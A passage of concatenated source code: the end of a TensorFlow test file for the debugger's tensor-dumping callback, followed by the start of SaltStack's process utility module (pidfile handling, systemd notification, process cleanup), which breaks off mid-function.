self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 4)
for execution in executions:
self.assertStartsWith(execution.op_type, "__inference_ceil_times_two_")
executed_graph_ids = [execution.graph_id for execution in executions]
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertNotEqual(executed_graph_ids[0], executed_graph_ids[1])
self.assertNotEqual(executed_graph_ids[2], executed_graph_ids[3])
for executed_graph_id in executed_graph_ids:
self.assertEqual(
reader.graph_by_id(executed_graph_id).name, "ceil_times_two")
@parameterized.named_parameters(
("AddV2", "AddV2"),
("Log", "Log"),
("AddV2AndLog", "(AddV2|Log)"),
)
@test_util.run_in_graph_and_eager_modes
def testOpRegex(self, op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
op_regex=op_regex)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(
self.evaluate(sin1p_log_sum(x, y)), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_op_digests = reader.graph_op_digests()
op_types = [digest.op_type for digest in graph_op_digests]
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
graph_exec_digests = reader.graph_execution_traces(digest=True)
executed_op_types = [digest.op_type for digest in graph_exec_digests]
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests]
if op_regex == "AddV2":
self.assertEqual(executed_op_types, ["AddV2", "AddV2"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(
tensor_values[1], np.log(5.0) + 1.0) # 2nd AddV2 op.
elif op_regex == "Log":
self.assertEqual(executed_op_types, ["Log"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], np.log(5.0)) # Log op.
else: # "(AddV2|Log)"
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(
tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
def testIncorrectTensorDTypeArgFormatLeadsToError(self):
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*\{\}"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes=dict())
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes="float32")
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_dtypes=dtypes.float32)
with self.assertRaises(TypeError):
dumping_callback.enable_dump_debug_info(self.dump_root, tensor_dtypes=[
lambda dtype: dtype.is_floating, lambda dtype: dtype.is_integer])
@parameterized.named_parameters(
("float", [dtypes.float32], None),
("float_only_sum", ["float32"], "Sum"),
("float_no_sum", (dtypes.float32,), "(?!Sum)"),
("int", [dtypes.int32], None),
("int_via_lambda", lambda dtype: dtype.is_integer, None),
("exclude_Sum", None, "(?!Sum)"),
("All", None, None),
)
@test_util.run_in_graph_and_eager_modes
def testTensorDTypesAndOpRegexFilters(self,
tensor_dtypes,
op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
tensor_dtypes=tensor_dtypes,
op_regex=op_regex)
@def_function.function
def unique_sum(xs):
"""Sum over the unique values, for testing."""
unique_xs, indices = array_ops.unique(xs)
return math_ops.reduce_sum(unique_xs), indices
xs = constant_op.constant([2., 6., 8., 1., 2.], dtype=dtypes.float32)
y, indices = self.evaluate(unique_sum(xs))
self.assertAllClose(y, 17.)
self.assertAllEqual(indices, [0, 1, 2, 3, 0])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_digests = reader.graph_execution_traces(digest=True)
executed_op_types = [digest.op_type for digest in graph_exec_digests]
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests]
if tensor_dtypes == [dtypes.float32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique", "Sum"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
self.assertAllClose(tensor_values[1], 17.) # Sum.
elif tensor_dtypes == ["float32"] and op_regex == "Sum":
self.assertEqual(executed_op_types, ["Sum"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], 17.) # Sum.
elif tensor_dtypes == (dtypes.float32,) and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
elif tensor_dtypes == [dtypes.int32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(
tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif callable(tensor_dtypes) and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(
tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif not tensor_dtypes and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique", "Unique"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
self.assertAllEqual(
tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
else: # "All".
self.assertEqual(executed_op_types, ["Unique", "Unique", "Sum"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
self.assertAllEqual(
tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
self.assertAllClose(tensor_values[2], 17) # Sum.
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testFunctionExecutionWithControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0
i += 1
return x
x = constant_op.constant(0.5, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 8.0)
writer.FlushNonExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_op_digests = reader.graph_op_digests()
op_types = [digest.op_type for digest in graph_op_digests]
self.assertIn("Less", op_types)
self.assertIn("Mul", op_types)
self.assertIn("AddV2", op_types)
# Before FlushExecutionFiles() is called, the .execution and
# .graph_execution_traces files should be both empty.
self.assertEqual(reader.num_executions(), 0)
self.assertEqual(reader.num_graph_execution_traces(), 0)
# TODO(cais): Backport execution instrumentation to tf.Session.
writer.FlushExecutionFiles()
# After the flushing, the .execution file should hold the appropriate
# contents.
reader.update()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
executions = reader.executions()
self.assertLen(executions, 1)
executed_op_types = [execution.op_type for execution in executions]
self.assertIn("iterative_doubling", executions[0].op_type)
execution = executions[0]
self.assertLen(execution.input_tensor_ids, 2)
self.assertLen(execution.output_tensor_ids, 1)
self.assertEqual(
debug_event_pb2.TensorDebugMode.keys()[execution.tensor_debug_mode],
tensor_debug_mode)
if tensor_debug_mode == "FULL_TENSOR":
tensor_values = reader.execution_to_tensor_values(execution)
self.assertAllClose(tensor_values, [8.0])
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces]
if tensor_debug_mode != "CURT_HEALTH":
# Less outputs a boolean tensor, which is not tracked under CURT_HEALTH.
# The Less op should have been executed 5 times.
self.assertEqual(executed_op_types.count("Less"), 5)
# The last executed op should be Less.
self.assertEqual(executed_op_types[-1], "Less")
# AddV2 produces an int tensor, which is not tracked under CURT_HEALTH.
# The AddV2 op should have been run, but we refrain from asserting on
# how many times it's executed.
self.assertIn("AddV2", executed_op_types)
for trace in graph_exec_traces:
self.assertEqual(trace.output_slot, 0)
# The Mul op should have been executed 4 times.
self.assertEqual(executed_op_types.count("Mul"), 4)
tensor_values = [reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces]
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertAllEqual(tensor_value, [])
elif tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor_id; 2nd element: 0 indicating no inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0.0])
elif tensor_debug_mode == "FULL_TENSOR":
less_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Less"]
self.assertAllEqual(less_values, [True, True, True, True, False])
mul_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Mul"]
self.assertAllClose(mul_values, [1.0, 2.0, 4.0, 8.0])
def testCallingEnableTracingTwiceWithTheSameDumpRootIsIdempotent(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 2)
for execution in executions:
self.assertGreater(execution.wall_time, 0)
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
_, stack_frames = reader.read_execution_stack_trace(execution)
self._verifyStackFrames(stack_frames)
def testCallingEnableTracingTwiceWithDifferentDumpRootsOverwrites(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
new_dump_root = self.dump_root + "_new_dump_root"
writer = dumping_callback.enable_dump_debug_info(new_dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(new_dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 2)
for execution in executions:
self.assertGreater(execution.wall_time, 0)
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
_, stack_frames = reader.read_execution_stack_trace(execution)
self._verifyStackFrames(stack_frames)
with debug_events_reader.DebugDataReader(
self.dump_root) as old_dump_root_reader:
old_dump_root_reader.update()
# The old dump root shouldn't have been written to.
self.assertEqual(old_dump_root_reader.num_executions(), 0)
self.assertFalse(old_dump_root_reader.outermost_graphs())
def testCallingEnableRepeatedlyWithDifferentTensorDebugMode(self):
"""Assert calling enable_dump_debug_info() with two tensor-debug modes.
It should lead to overwriting of the previously-configured mode.
"""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def add_1_divide_by_2(x):
return (x + 1.0) / 2.0
self.assertAllClose(add_1_divide_by_2(constant_op.constant(4.0)), 2.5)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_digests = reader.graph_execution_traces(digest=True)
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests]
for tensor_value in tensor_values:
# Under NO_TENSOR mode, each tensor is summarized as an empty float32
# array.
self.assertAllEqual(tensor_value, [])
with self.assertRaisesRegexp(
ValueError, r"already.*NO_TENSOR.*FULL_TENSOR.*not be honored"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR")
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
def testDisableTracingWorks(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
dumping_callback.disable_dump_debug_info()
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
self.assertEqual(reader.num_executions(), 0)
self.assertEqual(reader.num_graph_execution_traces(), 0)
self.assertFalse(reader.outermost_graphs())
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
def testMultiThreadedExecutionWithSameSetting(self, tensor_debug_mode):
"""Dumping from multiple threads using the same setting."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = variables.Variable(10.0, dtype=dtypes.float32)
y = variables.Variable(3.0, dtype=dtypes.float32)
@def_function.function
def increase_x():
return x.assign_add(y * 2.0)
increase_x()
num_threads = 3
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=increase_x))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# 10 --> 16 --> 22 --> 28 --> 34.
self.assertAllClose(x.read_value(), 34.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
exec_digests = reader.executions(digest=True)
prev_wall_time = 1
for exec_digest in exec_digests:
self.assertGreaterEqual(exec_digest.wall_time, prev_wall_time)
prev_wall_time = exec_digest.wall_time
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces]
self.assertEqual(executed_op_types.count("Mul"), 1 + num_threads)
self.assertEqual(
executed_op_types.count("ReadVariableOp"), 2 * (1 + num_threads))
for trace in graph_exec_traces:
# These are all single-output tensors.
self.assertEqual(trace.output_slot, 0)
tensor_values = [reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces]
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertAllEqual(tensor_value, [])
elif tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor ID; 2nd element: 0 indicating no inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0])
elif tensor_debug_mode == "CONCISE_HEALTH":
for tensor_value in tensor_values:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor ID.
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 1, 0, 0, 0])
elif tensor_debug_mode == "SHAPE":
for trace in graph_exec_traces:
if trace.op_type == "Mul":
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
mul_value = reader.graph_execution_trace_to_tensor_value(trace)
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (float32).
# 3rd element: rank.
# 4th element: element count.
self.assertAllClose(mul_value, [tensor_id, 1, 0, 1, 0, 0, 0, 0, 0, 0])
elif tensor_debug_mode == "FULL_TENSOR":
mul_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Mul"]
self.assertAllClose(mul_values, [6.0, 6.0, 6.0, 6.0])
def testMultiThreadedDumpingWithDifferentSettings(self):
dump_root_1 = os.path.join(self.dump_root, "dump_root_1")
dump_root_2 = os.path.join(self.dump_root, "dump_root_2")
v1 = variables.Variable(10.0, dtype=dtypes.float32)
v2 = variables.Variable(3.0, dtype=dtypes.float32)
def add_negative_v1_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_1, tensor_debug_mode="FULL_TENSOR")
# Run in a loop to facilitate interleaving between threads.
for _ in range(3):
v1.assign_add(-(v1 ** 2.0))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
def add_negative_v2_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_2, tensor_debug_mode="FULL_TENSOR")
v2_squared = v2 ** 2.0
# Since dumping is disabled before the Neg op is called, no tensor data
# should be dumped from the op, but this shouldn't affect the dumping of
# the tensor data from the Neg op in `add_negative_v1_squared_to_itself`.
# Both behavior is checked below.
dumping_callback.disable_dump_debug_info()
negative_v2_squared = -v2_squared
v2.assign_add(negative_v2_squared)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
# v2 is mutated on a sub-thread.
sub_thread = threading.Thread(target=add_negative_v2_squared_to_itself)
sub_thread.start()
add_negative_v1_squared_to_itself() # v1 is mutated on the main thread.
sub_thread.join()
# 10 - 10 * 10 = -90.
# -90 - (-90 * -90) = -8190.
# -8190 - (-8190 * -8190) = -67084290.
self.assertAllClose(v1.read_value(), -67084290.0)
self.assertAllClose(v2.read_value(), -6.0)
with debug_events_reader.DebugDataReader(dump_root_1) as reader:
reader.update()
exec_digests = reader.executions(digest=True)
v1_squared_values = [
reader.execution_to_tensor_values(digest)
for digest in exec_digests if digest.op_type == "Pow"]
negative_v1_squared_values = [
reader.execution_to_tensor_values(digest)
for digest in exec_digests if digest.op_type == "Neg"]
self.assertAllClose(v1_squared_values, [[100.0], [8100.0], [67076100.0]])
self.assertAllClose(
negative_v1_squared_values, [[-100.0], [-8100.0], [-67076100.0]])
with debug_events_reader.DebugDataReader(dump_root_2) as reader:
reader.update()
exec_digests = reader.executions(digest=True)
executed_op_types = [digest.op_type for digest in exec_digests]
self.assertNotIn("Neg", executed_op_types)
v2_squared_values = [
reader.execution_to_tensor_values(digest)
for digest in exec_digests if digest.op_type == "Pow"]
self.assertAllClose(v2_squared_values, [[9.0]])
@test_util.run_in_graph_and_eager_modes
def testNestedContextIsCapturedByGraphOpCreationHistory(self):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0 - 1.0
i += 1
return x
x = constant_op.constant(2.0, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
# 2 * 2 - 1 = 3; 3 * 2 - 1 = 5; 5 * 2 - 1 = 9; 9 * 2 - 1 = 17.
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 17.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
less_op_digest = reader.graph_op_digests(op_type="Less")[-1]
mul_op_digest = reader.graph_op_digests(op_type="Mul")[-1]
sub_op_digest = reader.graph_op_digests(op_type="Sub")[-1]
# The Less op is from the while-loop cond context and hence should have
# a different innermost context ID from the mul and sub ops, which are
# both from the while-loop body context.
self.assertNotEqual(less_op_digest.graph_id, mul_op_digest.graph_id)
self.assertNotEqual(less_op_digest.graph_id, sub_op_digest.graph_id)
# The Mul and Sub ops are from the same innermost context.
self.assertEqual(mul_op_digest.graph_id, sub_op_digest.graph_id)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelPredict(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
batch_size = 5
xs = np.ones([batch_size, 3, 4])
self.assertAllClose(model.predict(xs), np.zeros([batch_size, 1]))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
self.assertTrue(reader.executions(digest=True))
graph_exec_digests = reader.graph_execution_traces(digest=True)
executed_op_types = [digest.op_type for digest in graph_exec_digests]
# These are the ops that we can safely assume to have been executed during
# the model prediction.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests]
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertAllEqual(tensor_value, [])
else:
# Refrain from asserting the internal implementation details of the LSTM
# layer.
self.assertTrue(any(
bool(tensor_value.size) for tensor_value in tensor_values))
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testSimpleKerasRecurrentModelFit(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
model = _create_simple_recurrent_keras_model([3, 4])
xs = np.ones([5, 3, 4])
ys = np.ones([5, 1])
history = model.fit(xs, ys, epochs=3, verbose=0)
self.assertAllClose(
history.history["loss"], [1.0, 0.9603999853134155, 0.9223681688308716])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
if context.executing_eagerly():
exec_digests = reader.executions(digest=True)
self.assertTrue(exec_digests)
if tensor_debug_mode == "NO_TENSOR":
for digest in exec_digests:
tensor_values = reader.execution_to_tensor_values(digest)
for tensor_value in tensor_values:
self.assertEqual(tensor_value, [])
graph_exec_digests = reader.graph_execution_traces(digest=True)
executed_op_types = [digest.op_type for digest in graph_exec_digests]
# These are the ops that we can safely assume to have been executed during
# the recurrent model's fit() call.
self.assertIn("MatMul", executed_op_types)
self.assertIn("BiasAdd", executed_op_types)
# On the GPU, CudnnRNN is used in lieu of the default op-by-op
# implementation.
self.assertTrue(
("Sigmoid" in executed_op_types and "Tanh" in executed_op_types or
"CudnnRNN" in executed_op_types))
self.assertTrue(
("SigmoidGrad" in executed_op_types and
"TanhGrad" in executed_op_types or
"CudnnRNNBackprop" in executed_op_types))
if tensor_debug_mode == "NO_TENSOR":
for digest in graph_exec_digests:
tensor_values = reader.graph_execution_trace_to_tensor_value(digest)
for tensor_value in tensor_values:
self.assertEqual(tensor_value, [])
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testMobiletNetV2Fit(self, tensor_debug_mode):
"""Test training Keras MobileNetV2 works with dumping."""
# Use a large circular-buffer to make sure we capture all the executed ops.
writer = dumping_callback.enable_dump_debug_info(
self.dump_root,
tensor_debug_mode=tensor_debug_mode,
circular_buffer_size=100000)
model = mobilenet_v2.MobileNetV2(
input_shape=(32, 32, 3), alpha=0.1, weights=None)
y = model.layers[22].output
y = core.Flatten()(y)
y = core.Dense(1)(y)
model = models.Model(inputs=model.inputs, outputs=y)
batch_size = 2
xs = np.zeros([batch_size] + list(model.input_shape[1:]))
ys = np.zeros([batch_size] + list(model.output_shape[1:]))
model.compile(optimizer="sgd", loss="mse")
epochs = 1
history = model.fit(xs, ys, epochs=epochs, verbose=0)
self.assertLen(history.history["loss"], epochs)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
# .execution file.
exec_digests = reader.executions(digest=True)
self.assertTrue(exec_digests)
graph_exec_digests = reader.graph_execution_traces()
executed_op_types = [digest.op_type for digest in graph_exec_digests]
# These are the ops that we can safely assume to have been executed during
# the model's fit() call.
self.assertIn("Conv2D", executed_op_types)
self.assertIn("Relu6", executed_op_types)
self.assertIn("Conv2DBackpropFilter", executed_op_types)
self.assertIn("Relu6Grad", executed_op_types)
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
tensor_values = [
reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests]
for tensor_value in tensor_values:
self.assertAllEqual(tensor_value, [])
elif tensor_debug_mode == "FULL_TENSOR":
conv2d_values = [
reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests if digest.op_type == "Conv2D"]
self.assertTrue(conv2d_values)
for conv2d_value in conv2d_values:
self.assertGreater(len(conv2d_value.shape), 1)
self.assertEqual(conv2d_value.shape[0], batch_size)
relu6_values = [
reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests if digest.op_type == "Relu6"]
self.assertTrue(relu6_values)
for relu6_value in relu6_values:
self.assertGreater(len(relu6_value.shape), 1)
self.assertEqual(relu6_value.shape[0], batch_size)
conv2d_bp_filter_values = [
reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests
if digest.op_type == "Conv2DBackpropFilter"]
self.assertTrue(conv2d_bp_filter_values)
for conv2d_bp_filter_value in conv2d_bp_filter_values:
self.assertGreater(len(conv2d_bp_filter_value.shape), 1)
relu6_grad_values = [
reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests if digest.op_type == "Relu6Grad"]
self.assertTrue(relu6_grad_values)
for relu6_grad_value in relu6_grad_values:
self.assertGreater(len(relu6_grad_value.shape), 1)
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
process.py | # -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import os
import sys
import time
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
